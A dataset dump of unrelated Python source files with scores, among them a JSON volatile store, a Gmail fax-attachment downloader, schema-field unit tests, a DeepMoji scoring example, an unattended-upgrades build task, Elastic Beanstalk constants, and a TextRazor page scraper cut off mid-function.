text
stringlengths
733
1.02M
score
float64
0
0.27
# Copyright 2014 Open vStorage NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
Dummy volatile module
"""
import time
import json


class DummyVolatileStore(object):
    """
    This is a dummy volatile store that makes use of a local json file.

    On-disk layout: {'s': {key: value}, 't': {key: expiry_epoch_seconds}}.
    """
    _path = '/run/dummyvolatile.json'
    _storage = {}
    _timeout = {}

    @staticmethod
    def clean():
        """
        Empties the store by removing the backing file; a missing file is fine.
        """
        import os
        try:
            os.remove(DummyVolatileStore._path)
        except OSError:
            pass

    def _read(self):
        """
        Reads the local json file.

        Returns an empty store structure when the file does not exist yet.
        Uses a context manager so the handle is closed even when json parsing
        raises (the original code leaked the handle in that case).
        """
        try:
            with open(self._path, 'r') as handle:
                data = json.loads(handle.read())
        except IOError:
            data = {'t': {}, 's': {}}
        return data

    def get(self, key, default=None):
        """
        Retrieves the value for a given key.

        Returns `default` when the key is missing or its timeout has expired.
        """
        data = self._read()
        if key in data['t'] and data['t'][key] > time.time():
            value = data['s'].get(key)
            if 'ovs_primarykeys_' in key:
                # Primary-key entries store their first element as a set;
                # json round-trips it as a list, so convert back.
                value[0] = set(value[0])
            return value
        return default

    def set(self, key, value, timeout=99999999):
        """
        Sets the value for a key, with an expiry `timeout` in seconds.
        """
        if 'ovs_primarykeys_' in key:
            # Sets are not json-serializable; store as a list (see get()).
            value[0] = list(value[0])
        data = self._read()
        data['s'][key] = value
        data['t'][key] = time.time() + timeout
        self._save(data)

    def add(self, key, value, timeout=99999999):
        """
        Adds a given key to the store, expecting the key does not exist yet.

        Returns True when the key was added, False when it already existed.
        """
        data = self._read()
        if key not in data['s']:
            self.set(key, value, timeout)
            return True
        else:
            return False

    def delete(self, key):
        """
        Deletes a given key (value and timeout) from the store, if present.
        """
        data = self._read()
        if key in data['s']:
            del data['s'][key]
            del data['t'][key]
            self._save(data)

    def incr(self, key, delta=1):
        """
        Increments the value of the key by `delta`, expecting it exists.

        Returns True on success, False when the key is absent. The existing
        timeout is left untouched.
        """
        data = self._read()
        if key in data['s']:
            data['s'][key] += delta
            self._save(data)
            return True
        return False

    def _save(self, data):
        """
        Saves the store structure to the local json file.
        """
        rawdata = json.dumps(data, sort_keys=True, indent=2)
        with open(self._path, 'w+') as handle:
            handle.write(rawdata)
0
#!/usr/bin/python __author__="Rob Power" __date__ ="$26-aug-2013 18.00.00$" # # Copyright (C) Rob Power 2011-2013 # This file is part of FaxGratis/GmailFaxCheck. # # FaxGratis/GmailFaxCheck is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # FaxGratis/GmailFaxCheck is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with FaxGratis/GmailFaxCheckr. If not, see <http://www.gnu.org/licenses/>. # #------------------------------------------------------------------------------ # Filename: GmailFaxCheck.py # Program Name: GmailFaxCheck # (FaxGratis project) # https://github.com/robpower/GmailFaxCheck # Version: 1.2.1 # Author: Rob Power <dev [at] robpower.info> # Website: http://blog.robpower.info # https://github.com/robpower # https://www.gitorious.org/~robpower # Last Modified: 26/08/2013 # Description: This python script checks Gmail IMAP mail server # for the given account for incoming EuteliaVoip Faxes # and outgoing Faxator receipt. # # It first checks for EuteliaVoip Faxes under label # "$incoming_folder_check": if any Unread mails is detected, # it saves the attached fax PDF under "$archive_dir", # prints a copy and marks email as read. # # Then checks for Faxator receipts under label # "$outgoing_folder_check": if any Unread email is detected, # it saves the attached fax receipt PDF under "$receipt_dir", # prints a copy and marks email as read. # # Filename is the format: AAAA-MM-DD_HH.MM_SENDER#_originalfilename # Gmail filter must be configured to archive fax mail and move them to # "folder_check" label. 
# #------------------------------------------------------------------------------ # # import getopt import getpass import os import sys import datetime import imaplib import email import email.Errors import email.Header import email.Message import email.Utils from time import strftime import shutil import subprocess from ConfigParser import SafeConfigParser #from time import sleep Usage = """Usage: %s --user <user> --password <password> --frequency <polling frequency> <imap-server> --user Provide <user> for authentication on <imap-server> --password Password for the given user Example: attdownload.py --user username --password password """ # Loads settings from "settings.conf" file cur_file = os.path.abspath(__file__) cur_dir = os.path.dirname(cur_file) settings = SafeConfigParser() settings.read(os.path.join(cur_dir,'settings.conf')) # ARCHIVE AttachDir = settings.get('archive','AttachDir') # Attachment Temporary Directory Path ReceivedArchiveDir = settings.get('archive','ReceivedArchiveDir') ReceiptsArchiveDir = settings.get('archive','ReceiptsArchiveDir') # GMAIL incoming_folder_check = settings.get('gmail','incoming_folder_check') receipts_folder_check = settings.get('gmail','receipts_folder_check') #Faxator Receipts Gmail Label User = settings.get('gmail','User') # IMAP4 user Password = settings.get('gmail','Password') # User password # EXTRA DeleteMessages = settings.getint('extra','DeleteMessages') SaveAttachments = settings.getint('extra','SaveAttachments') # Save all attachments found Frequency = None #settings.get('extra','Frequency') # Mail server polling frequency exists = settings.getint('extra','exists') name = settings.getint('extra','name') set_read = settings.getint('extra','set_read') # Put 1 for normal use, 0 for test purpose (does not mark email at end) DEBUG = settings.getint('extra','DEBUG') # Put 1 for debug output def usage(reason=''): sys.stdout.flush() if reason: sys.stderr.write('\t%s\n\n' % reason) head, tail = os.path.split(sys.argv[0]) 
sys.stderr.write(Usage % tail) sys.exit(1) def args(): try: optlist, args = getopt.getopt(sys.argv[1:], '?',['user=', 'password=']) except getopt.error, val: usage(val) global SaveAttachments global User global Password global Frequency for opt,val in optlist: if opt == '--user': User = val elif opt == '--password': Password = val else: usage() if len(args) != 1: usage() return args[0] def write_file(filename, data): fullpath = os.path.join(AttachDir, filename) fd = open(fullpath, "wb") fd.write(data) fd.close() def archive_file(filename, status): if status == 'RECEIVED': shutil.copy(os.path.join(AttachDir, filename), os.path.join(ReceivedArchiveDir, filename)) # Copies the file to received archive folder elif status == 'SENT' or status == 'NOT_SENT' or status == 'CONVERTED' or status == 'Unknown': shutil.copy(os.path.join(AttachDir, filename), os.path.join(ReceiptsArchiveDir, filename)) # Copies the file to receipts archive folder def print_file(filename,dir): subprocess.Popen(['lpr', os.path.join(dir, filename)]) # Launches Fax Printing os.remove(os.path.join(AttachDir, filename)) # Remove the file from temp directory def gen_filename(name, mtyp, number, date, status): """ """ timepart = date.strftime('%Y-%m-%d_%H.%M') file = email.Header.decode_header(name)[0][0] file = os.path.basename(file) path = timepart + '_' + number + '_' + status + '_' + file return path def error(reason): sys.stderr.write('%s\n' % reason) sys.exit(1) def walk_parts(msg, number, date, count, msgnum, status): for part in msg.walk(): if part.is_multipart(): if DEBUG == 1: print "Found header part: Ignoring..." continue dtypes = part.get_params(None, 'Content-Disposition') if not dtypes: if part.get_content_type() == 'text/plain': if DEBUG == 1: print "Found plaintext part: Ignoring..." continue if part.get_content_type() == 'text/html' : if DEBUG == 1: print "Found HTML part: Ignoring..." 
continue # if DEBUG == 1: # print "Found possible attachment [Type: " + part.get_content_type + "]: Processing" # # # ctypes = part.get_params() # if not ctypes: # if DEBUG == 1: # print "No CTypes" # continue # for key,val in ctypes: # if DEBUG == 1: # print "Key: " + key # print "Value: " + val # if key.lower() == 'name': # filename = gen_filename(val, part.get_content_type(), number, date, status) # print "Filename: " + filename # break # # else: # if DEBUG == 1: # print "Found :" + part.get_content_type() # print "CTypes:" + ctypes.length() # continue else: if DEBUG == 1: print "Found possible attachment [Type: " + part.get_content_type() + "]: Processing..." attachment,filename = None,None for key,val in dtypes: key = key.lower() if key == 'filename': filename = val if DEBUG == 1: print "[Filename: " + filename + "]" if key == 'attachment' or key == 'inline': attachment = 1 if DEBUG ==1: print "[Attach. type: " + key + "]" else: if DEBUG == 1: print "Key: " + key if not attachment: continue filename = gen_filename(filename, part.get_content_type(), number, date, status) try: data = part.get_payload(decode=1) except: typ, val = sys.exc_info()[:2] warn("Message %s attachment decode error: %s for %s ``%s''" % (msgnum, str(val), part.get_content_type(), filename)) continue if not data: warn("Could not decode attachment %s for %s" % (part.get_content_type(), filename)) continue if type(data) is type(msg): count = walk_parts(data, number, date, count, msgnum) continue if SaveAttachments: exists = "0" try: #Check if its already there if not os.path.isfile(os.path.join(AttachDir, filename)) : exists = "1" if exists == "1": write_file(filename, data) # Writes file to temp dir (AttachDir) if status == 'RECEIVED': if not os.path.isfile(os.path.join(ReceivedArchiveDir, filename)): archive_file(filename, status) print_file(filename,ReceivedArchiveDir) print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Printed Fax " + filename.split('_')[-1] + " from " + number + " received on 
" + date.strftime('%Y/%m/%d - %H:%M:%S') print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Filename: " + filename print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: ---" elif status == 'SENT' or status == 'NOT_SENT' or status == 'CONVERTED' or status == 'Unknown': if not os.path.isfile(os.path.join(ReceiptsArchiveDir, filename)): archive_file(filename, status) print_file(filename, ReceiptsArchiveDir) print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Printed Fax Receipt " + filename.split('_')[-1] + ": fax to " + number + " sent on " + date.strftime('%Y/%m/%d - %H:%M:%S') print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Filename: " + filename + '\tResult: ' +status print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: ---" except IOError, val: error('Could not create "%s": %s' % (filename, str(val))) count += 1 return count def process_message(text, msgnum,folder_to_check): try: msg = email.message_from_string(text) except email.Errors.MessageError, val: warn("Message %s parse error: %s" % (msgnum, str(val))) return text date_string ='' + msg["Date"] date_string = date_string.split(', ', 1)[1] # Strips out Weekday date_string = date_string.split(' +', 1)[0] # Strips out UTC date = datetime.datetime.strptime(date_string, '%d %b %Y %H:%M:%S') # Decode datetime from string number = msg["Subject"] if folder_to_check == incoming_folder_check: number = number.split('numero ')[-1] status = 'RECEIVED' elif folder_to_check == receipts_folder_check: if 'OK' in number: number = number.split('OK ')[-1] status = 'SENT' elif 'ERRATA' in number: number = number.split('ERRATA ')[-1] status = 'NOT_SENT' elif 'CONVERSIONE' in number: number = number.splt('CONVERSIONE ')[-1] status = 'CONVERTED' else: number = 0000000000 status = 'Unknown' attachments_found = walk_parts(msg, number, date, 0, msgnum, status) if attachments_found: if DEBUG == 1: print "Attachments found: %d" % attachments_found return '' else: if DEBUG == 1: print "No attachments found" return None def read_messages(fd): data = []; 
app = data.append for line in fd: if line[:5] == 'From ' and data: yield ''.join(data) data[:] = [] app(line) if data: yield ''.join(data) def process_server(host,folder_to_check): global DeleteAttachments try: mbox = imaplib.IMAP4_SSL(host) except: typ,val = sys.exc_info()[:2] error('Could not connect to IMAP server "%s": %s' % (host, str(val))) if DEBUG==1: print mbox if User or mbox.state != 'AUTH': user = User or getpass.getuser() if Password == "": pasw = getpass.getpass("Please enter password for %s on %s: " % (user, host)) else: pasw = Password try: typ,dat = mbox.login(user, pasw) except: typ,dat = sys.exc_info()[:2] if typ != 'OK': error('Could not open INBOX for "%s" on "%s": %s' % (user, host, str(dat))) if DEBUG == 1: print "Selecting Folder " + folder_to_check sel_response = mbox.select(folder_to_check) #mbox.select(readonly=(DeleteMessages)) if DEBUG == 1: print sel_response typ, dat = mbox.search(None, "UNSEEN") if DEBUG == 1: print typ, dat #mbox.create("DownloadedMails") #archiveme = [] for num in dat[0].split(): typ, dat = mbox.fetch(num, "(BODY.PEEK[])") if typ != 'OK': error(dat[-1]) message = dat[0][1] if process_message(message, num,folder_to_check) == '': if set_read == 1: mbox.store(num, '+FLAGS', '\\Seen') # Mark Email as Read # archiveme.append(num) #if archiveme == []: # print "\n" # print "No mails with attachment found in INBOX" #archiveme.sort() #for number in archiveme: # mbox.copy(num, 'DownloadedMails') # mbox.store(num, '+FLAGS', '\\Seen') # Mark Email as Read #mbox.expunge() mbox.close() mbox.logout() process_server('imap.gmail.com',incoming_folder_check) process_server('imap.gmail.com',receipts_folder_check)
0.029855
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Unit tests for common/schema_fields.py."""

__author__ = 'John Orr (jorr@google.com)'

import json
import unittest

from common import schema_fields


def remove_whitespace(s):
    # Expected strings below are compared whitespace-insensitively.
    return ''.join(s.split())


class BaseFieldTests(unittest.TestCase):
    """Base class for the tests on a schema field."""

    def assert_json_schema_value(self, expected, field):
        # Compare the field's JSON-schema dict against an expected JSON string.
        self.assertEquals(
            remove_whitespace(expected),
            remove_whitespace(json.dumps(field.get_json_schema_dict())))

    def assert_schema_dict_value(self, expected, field):
        # Compare the field's (path, value) schema-dict pairs against an
        # expected JSON string.
        self.assertEquals(
            remove_whitespace(expected),
            remove_whitespace(json.dumps(field._get_schema_dict([]))))


class SchemaFieldTests(BaseFieldTests):
    """Unit tests for common.schema_fields.SchemaField."""

    def test_simple_field(self):
        field = schema_fields.SchemaField('aName', 'aLabel', 'aType')
        expected = '{"type":"aType"}'
        self.assert_json_schema_value(expected, field)
        expected = '[[["_inputex"], {"label": "aLabel"}]]'
        self.assert_schema_dict_value(expected, field)
        self.assertEquals('aName', field.name)

    def test_extra_schema_dict(self):
        field = schema_fields.SchemaField(
            'aName', 'aLabel', 'aType',
            extra_schema_dict_values={'a': 'A', 'b': 'B'})
        expected = '[[["_inputex"], {"a": "A", "b": "B", "label": "aLabel"}]]'
        self.assert_schema_dict_value(expected, field)

    def test_uneditable_field(self):
        field = schema_fields.SchemaField(
            'aName', 'aLabel', 'aType', editable=False)
        expected = '{"type":"aType"}'
        self.assert_json_schema_value(expected, field)
        expected = ('[[["_inputex"], {"_type": "uneditable", '
                    '"label": "aLabel"}]]')
        self.assert_schema_dict_value(expected, field)
        self.assertEquals('aName', field.name)

    def test_hidden_field(self):
        field = schema_fields.SchemaField('aName', 'aLabel', 'aType', hidden=True)
        expected = '{"type":"aType"}'
        self.assert_json_schema_value(expected, field)
        expected = '[[["_inputex"], {"_type": "hidden", "label": "aLabel"}]]'
        self.assert_schema_dict_value(expected, field)
        self.assertEquals('aName', field.name)


class FieldArrayTests(BaseFieldTests):
    """Unit tests for common.schema_fields.FieldArray."""

    def test_field_array_with_simple_members(self):
        array = schema_fields.FieldArray(
            'aName', 'aLabel',
            item_type=schema_fields.SchemaField(
                'unusedName', 'field_label', 'aType'))
        expected = """
            {
              "items": {"type": "aType"},
              "type": "array"
            }"""
        self.assert_json_schema_value(expected, array)
        expected = """
            [
              [["_inputex"],{"label":"aLabel"}],
              [["items","_inputex"],{"label":"field_label"}]
            ]
            """
        self.assert_schema_dict_value(expected, array)

    def test_field_array_with_object_members(self):
        object_type = schema_fields.FieldRegistry('object_title')
        object_type.add_property(schema_fields.SchemaField(
            'prop_name', 'prop_label', 'prop_type'))
        field = schema_fields.FieldArray(
            'aName', 'aLabel', item_type=object_type)
        expected = """
            {
              "items": {
                "type": "object",
                "id": "object_title",
                "properties": {
                  "prop_name": {"type":"prop_type"}
                }
              },
              "type":"array"}
            """
        self.assert_json_schema_value(expected, field)
        expected = """
            [
              [["_inputex"],{"label":"aLabel"}],
              [["items","title"],"object_title"],
              [["items","properties","prop_name","_inputex"],{"label":"prop_label"}]
            ]
            """
        self.assert_schema_dict_value(expected, field)

    def test_extra_schema_dict(self):
        array = schema_fields.FieldArray(
            'aName', 'aLabel',
            item_type=schema_fields.SchemaField(
                'unusedName', 'field_label', 'aType'),
            extra_schema_dict_values={'a': 'A', 'b': 'B'})
        expected = """
            [
              [["_inputex"],{"a":"A","b":"B","label":"aLabel"}],
              [["items","_inputex"],{"label":"field_label"}]]
            """
        self.assert_schema_dict_value(expected, array)


class FieldRegistryTests(BaseFieldTests):
    """Unit tests for common.schema_fields.FieldRegistry."""

    def test_single_property(self):
        reg = schema_fields.FieldRegistry(
            'registry_name', 'registry_description')
        reg.add_property(schema_fields.SchemaField(
            'field_name', 'field_label', 'property_type',
            description='property_description'))
        expected = """
            {
              "properties": {
                "field_name": {
                  "type": "property_type",
                  "description": "property_description"
                }
              },
              "type": "object",
              "id": "registry_name",
              "description": "registry_description"
            }"""
        self.assert_json_schema_value(expected, reg)
        expected = """
            [
              [["title"], "registry_name"],
              [["properties","field_name","_inputex"], {
                "description": "property_description",
                "label":"field_label"
              }]
            ]
            """
        self.assert_schema_dict_value(expected, reg)

    def test_single_property_with_select_data(self):
        reg = schema_fields.FieldRegistry(
            'registry_name', 'registry_description')
        reg.add_property(schema_fields.SchemaField(
            'field_name', 'field_label', 'string',
            select_data=[('a', 'A'), ('b', 'B')]))
        expected = """
            {
              "properties": {
                "field_name": {
                  "type": "string"
                }
              },
              "type": "object",
              "id": "registry_name",
              "description": "registry_description"
            }"""
        self.assert_json_schema_value(expected, reg)
        expected = """
            [
              [["title"],"registry_name"],
              [["properties","field_name","_inputex"],{
                "_type": "select",
                "choices":[
                  {"value": "a", "label": "A"},
                  {"value": "b","label": "B"}],
                "label":"field_label"
              }]
            ]
            """
        self.assert_schema_dict_value(expected, reg)

    def test_select_data_values_retain_boolean_and_numeric_type_in_json(self):
        # Booleans/ints in select_data must not be stringified.
        reg = schema_fields.FieldRegistry(
            'registry_name', 'registry_description')
        reg.add_property(schema_fields.SchemaField(
            'field_name', 'field_label', 'string',
            select_data=[(True, 'A'), (12, 'B'), ('c', 'C')]))
        expected = """
            [
              [["title"],"registry_name"],
              [["properties","field_name","_inputex"],{
                "_type": "select",
                "choices":[
                  {"value": true, "label": "A"},
                  {"value": 12,"label": "B"},
                  {"value": "c","label": "C"}],
                "label":"field_label"
              }]
            ]
            """
        self.assert_schema_dict_value(expected, reg)

    def test_object_with_array_property(self):
        reg = schema_fields.FieldRegistry(
            'registry_name', 'registry_description')
        reg.add_property(schema_fields.SchemaField(
            'field_name', 'field_label', 'field_type',
            description='field_description'))
        reg.add_property(schema_fields.FieldArray(
            'array_name', 'array_label',
            item_type=schema_fields.SchemaField(
                'unusedName', 'unusedLabel', 'aType')))
        expected = """
            {
              "properties": {
                "field_name": {
                  "type": "field_type",
                  "description": "field_description"
                },
                "array_name": {
                  "items": {"type": "aType"},
                  "type":"array"
                }
              },
              "type": "object",
              "id": "registry_name",
              "description": "registry_description"
            }
            """
        self.assert_json_schema_value(expected, reg)

    def test_extra_schema_dict(self):
        reg = schema_fields.FieldRegistry(
            'aName', 'aLabel',
            extra_schema_dict_values={'a': 'A', 'b': 'B'})
        expected = """
            [
              [["title"], "aName"],
              [["_inputex"], {"a": "A", "b": "B"}]]
            """
        self.assert_schema_dict_value(expected, reg)

    def test_mc_question_schema(self):
        """The multiple choice question schema is a good end-to-end example."""
        mc_question = schema_fields.FieldRegistry(
            'MC Question',
            extra_schema_dict_values={'className': 'mc-question'})
        mc_question.add_property(
            schema_fields.SchemaField('question', 'Question', 'string'))
        choice_type = schema_fields.FieldRegistry(
            'choice', extra_schema_dict_values={'className': 'mc-choice'})
        choice_type.add_property(
            schema_fields.SchemaField('text', 'Text', 'string'))
        choice_type.add_property(
            schema_fields.SchemaField('score', 'Score', 'string'))
        choice_type.add_property(
            schema_fields.SchemaField('feedback', 'Feedback', 'string'))
        choices_array = schema_fields.FieldArray(
            'choices', 'Choices', item_type=choice_type)
        mc_question.add_property(choices_array)
        expected = """
            {
              "type":"object",
              "id":"MCQuestion",
              "properties":{
                "question":{"type":"string"},
                "choices":{
                  "items":{
                    "type":"object",
                    "id":"choice",
                    "properties":{
                      "text":{"type":"string"},
                      "score":{"type":"string"},
                      "feedback":{"type":"string"}
                    }
                  },
                  "type":"array"
                }
              }
            }
            """
        self.assert_json_schema_value(expected, mc_question)
        expected = """
            [
              [["title"],"MCQuestion"],
              [["_inputex"],{"className":"mc-question"}],
              [["properties","question","_inputex"],{"label":"Question"}],
              [["properties","choices","_inputex"],{"label":"Choices"}],
              [["properties","choices","items","title"],"choice"],
              [["properties","choices","items","_inputex"],{"className":"mc-choice"}],
              [["properties","choices","items","properties","text","_inputex"],{
                "label":"Text"
              }],
              [["properties","choices","items","properties","score","_inputex"],{
                "label":"Score"
              }],
              [["properties","choices","items","properties","feedback","_inputex"],{
                "label":"Feedback"
              }]
            ]
            """
        self.assert_schema_dict_value(expected, mc_question)
0
# -*- coding: utf-8 -*-

""" Use DeepMoji to score texts for emoji distribution.

The resulting emoji ids (0-63) correspond to the mapping
in emoji_overview.png file at the root of the DeepMoji repo.

Writes the result to a csv file.
"""
from __future__ import print_function, division
import example_helper
import json
import csv
import numpy as np
from deepmoji.sentence_tokenizer import SentenceTokenizer
from deepmoji.model_def import deepmoji_emojis
from deepmoji.global_variables import PRETRAINED_PATH, VOCAB_PATH

OUTPUT_PATH = 'test_sentences.csv'

TEST_SENTENCES = [u'I love mom\'s cooking',
                  u'I love how you never reply back..',
                  u'I love cruising with my homies',
                  u'I love messing with yo mind!!',
                  u'I love you and now you\'re just gone..',
                  u'This is shit',
                  u'This is the shit']


def top_elements(array, k):
    # Indices of the k largest entries of `array`, ordered largest-first.
    # argpartition gives the top-k unordered; argsort then orders them.
    ind = np.argpartition(array, -k)[-k:]
    return ind[np.argsort(array[ind])][::-1]


maxlen = 30
batch_size = 32

print('Tokenizing using dictionary from {}'.format(VOCAB_PATH))
with open(VOCAB_PATH, 'r') as f:
    vocabulary = json.load(f)
st = SentenceTokenizer(vocabulary, maxlen)
tokenized, _, _ = st.tokenize_sentences(TEST_SENTENCES)

print('Loading model from {}.'.format(PRETRAINED_PATH))
model = deepmoji_emojis(maxlen, PRETRAINED_PATH)
model.summary()

print('Running predictions.')
prob = model.predict(tokenized)

# Find top emojis for each sentence. Emoji ids (0-63)
# correspond to the mapping in emoji_overview.png
# at the root of the DeepMoji repo.
print('Writing results to {}'.format(OUTPUT_PATH))
scores = []
for i, t in enumerate(TEST_SENTENCES):
    t_tokens = tokenized[i]
    # Row layout: text, sum of top-5 probabilities, 5 emoji ids, 5 probabilities.
    t_score = [t]
    t_prob = prob[i]
    ind_top = top_elements(t_prob, 5)
    t_score.append(sum(t_prob[ind_top]))
    t_score.extend(ind_top)
    t_score.extend([t_prob[ind] for ind in ind_top])
    scores.append(t_score)
    print(t_score)

# NOTE(review): 'wb' is Python 2 csv convention; on Python 3 this would need
# open(OUTPUT_PATH, 'w', newline='') instead.
with open(OUTPUT_PATH, 'wb') as csvfile:
    writer = csv.writer(csvfile, delimiter=',', lineterminator='\n')
    writer.writerow(['Text', 'Top5%',
                     'Emoji_1', 'Emoji_2', 'Emoji_3', 'Emoji_4', 'Emoji_5',
                     'Pct_1', 'Pct_2', 'Pct_3', 'Pct_4', 'Pct_5'])
    for i, row in enumerate(scores):
        try:
            writer.writerow(row)
        except Exception:
            print("Exception at row {}!".format(i))
0
from base import Task
from common import phases
from common.tasks import apt


class AddUnattendedUpgradesPackage(Task):
    # Build task: queue the `unattended-upgrades` package for installation.
    description = 'Adding `unattended-upgrades\' to the image packages'
    phase = phases.preparation
    predecessors = [apt.AddDefaultSources]

    @classmethod
    def run(cls, info):
        info.packages.add('unattended-upgrades')


class EnablePeriodicUpgrades(Task):
    # Build task: write /etc/apt/apt.conf.d/02periodic inside the image root,
    # with intervals taken from the manifest's `unattended_upgrades` plugin.
    description = 'Writing the periodic upgrades apt config file'
    phase = phases.system_modification

    @classmethod
    def run(cls, info):
        import os.path
        periodic_path = os.path.join(info.root, 'etc/apt/apt.conf.d/02periodic')
        update_interval = info.manifest.plugins['unattended_upgrades']['update_interval']
        download_interval = info.manifest.plugins['unattended_upgrades']['download_interval']
        upgrade_interval = info.manifest.plugins['unattended_upgrades']['upgrade_interval']
        with open(periodic_path, 'w') as periodic:
            # The written text uses apt.conf `//` comment syntax, not Python's.
            periodic.write(('// Enable the update/upgrade script (0=disable)\n'
                            'APT::Periodic::Enable "1";\n\n'
                            '// Do "apt-get update" automatically every n-days (0=disable)\n'
                            'APT::Periodic::Update-Package-Lists "{update_interval}";\n\n'
                            '// Do "apt-get upgrade --download-only" every n-days (0=disable)\n'
                            'APT::Periodic::Download-Upgradeable-Packages "{download_interval}";\n\n'
                            '// Run the "unattended-upgrade" security upgrade script\n'
                            '// every n-days (0=disabled)\n'
                            '// Requires the package "unattended-upgrades" and will write\n'
                            '// a log in /var/log/unattended-upgrades\n'
                            'APT::Periodic::Unattended-Upgrade "{upgrade_interval}";\n'
                            .format(update_interval=update_interval,
                                    download_interval=download_interval,
                                    upgrade_interval=upgrade_interval)))
0.026535
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
#     http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.


class namespaces(object):
    # Elastic Beanstalk option-setting namespace strings.
    AUTOSCALING = 'aws:autoscaling:asg'
    COMMAND = 'aws:elasticbeanstalk:command'
    RDS = 'aws:rds:dbinstance'
    ENVIRONMENT = 'aws:elasticbeanstalk:environment'
    HEALTH_CHECK = 'aws:elb:healthcheck'
    HEALTH_SYSTEM = 'aws:elasticbeanstalk:healthreporting:system'
    LAUNCH_CONFIGURATION = 'aws:autoscaling:launchconfiguration'
    LOAD_BALANCER = 'aws:elb:loadbalancer'
    ELB_POLICIES = 'aws:elb:policies'
    ROLLING_UPDATES = 'aws:autoscaling:updatepolicy:rollingupdate'
    VPC = 'aws:ec2:vpc'


class option_names(object):
    # Option names used inside the namespaces above.
    BATCH_SIZE = 'BatchSize'
    BATCH_SIZE_TYPE = 'BatchSizeType'
    CONNECTION_DRAINING = 'ConnectionDrainingEnabled'
    CROSS_ZONE = 'CrossZone'
    DB_DELETION_POLICY = 'DBDeletionPolicy'
    DB_ENGINE = 'DBEngine'
    DB_ENGINE_VERSION = 'DBEngineVersion'
    DB_INSTANCE = 'DBInstanceClass'
    DB_PASSWORD = 'DBPassword'
    DB_STORAGE_SIZE = 'DBAllocatedStorage'
    DB_SUBNETS = 'DBSubnets'
    DB_USER = 'DBUser'
    EC2_KEY_NAME = 'EC2KeyName'
    ELB_SCHEME = 'ELBScheme'
    ELB_SUBNETS = 'ELBSubnets'
    ENVIRONMENT_TYPE = 'EnvironmentType'
    IAM_INSTANCE_PROFILE = 'IamInstanceProfile'
    INSTANCE_TYPE = 'InstanceType'
    INTERVAL = 'Interval'
    LOAD_BALANCER_HTTP_PORT = 'LoadBalancerHTTPPort'
    LOAD_BALANCER_HTTPS_PORT = 'LoadBalancerHTTPSPort'
    MAX_SIZE = 'MaxSize'
    MIN_SIZE = 'MinSize'
    PUBLIC_IP = 'AssociatePublicIpAddress'
    ROLLING_UPDATE_ENABLED = 'RollingUpdateEnabled'
    ROLLING_UPDATE_TYPE = 'RollingUpdateType'
    SECURITY_GROUPS = 'SecurityGroups'
    SERVICE_ROLE = 'ServiceRole'
    SUBNETS = 'Subnets'
    SSL_CERT_ID = 'SSLCertificateId'
    SYSTEM_TYPE = 'SystemType'
    VPC_ID = 'VPCId'
0
#!/usr/bin/env python3
import argparse
import urllib.request
import os
import csv
import urllib.request  # NOTE(review): duplicate of the import above
import re

from bs4 import BeautifulSoup, Comment
import textrazor

# TextRazor client configured for topic extraction;
# the API key is read from a local `textrazor.token` file.
textrazor.api_key = open('textrazor.token', 'r').readline()
client = textrazor.TextRazor(extractors=["topics"])


def read_urls(filename):
    # Yield the 'url' column of a CSV file that has a header row.
    with open(filename) as fd:
        reader = csv.DictReader(fd)
        for row in reader:
            yield row['url']


def fetch_page(url):
    # Download a page (http:// is prepended when no scheme is given);
    # returns the raw response bytes, or None on any fetch error.
    if not url.startswith('http'):
        url = 'http://{}'.format(url)
    try:
        page = urllib.request.urlopen(url)
    except Exception as ex:
        print('ERROR: {}'.format(ex))
    else:
        return page.read()


def visible(element):
    # True when the element holds user-visible text
    # (i.e. not script/style/head content and not an HTML comment).
    if element.parent.name in ['style', 'script', '[document]', 'head', 'title']:
        return False
    if re.match('\s<!--.*-->\s', str(element)):
        return False
    return True


# Precompute a regex matching every Unicode control character,
# used below to strip non-printable characters from extracted text.
import unicodedata, re
all_chars = (chr(i) for i in range(0x110000))
control_chars = ''.join(c for c in all_chars if unicodedata.category(c) == 'Cc')
reg_control_char = re.compile('[%s]' % re.escape(control_chars))


def extract_meta(html):
    # Collect title/description/keywords plus the page's visible text,
    # then send the combined text to TextRazor for topic extraction.
    data = {}
    soup = BeautifulSoup(html, 'html.parser')
    title = soup.head.title.text
    data['title'] = title
    keywords = soup.head.find('meta', attrs={'name': 'keywords'})
    data['keywords'] = (keywords or {'content': ''})['content']
    description = soup.head.find('meta', attrs={'name': 'description'})
    data['description'] = (description or {}).get('content', '')
    print(data['title'])
    print(data['description'])
    print(data['keywords'])
    elements = soup.findAll(string=lambda x: x and not isinstance(x, Comment))  # take all elements containing text, excluding Comment
    elements = filter(visible, elements)  # filter out script, css, comment, raw data, ...
    elements = filter(lambda x: len(x) > 3, elements)  # filter out small texts
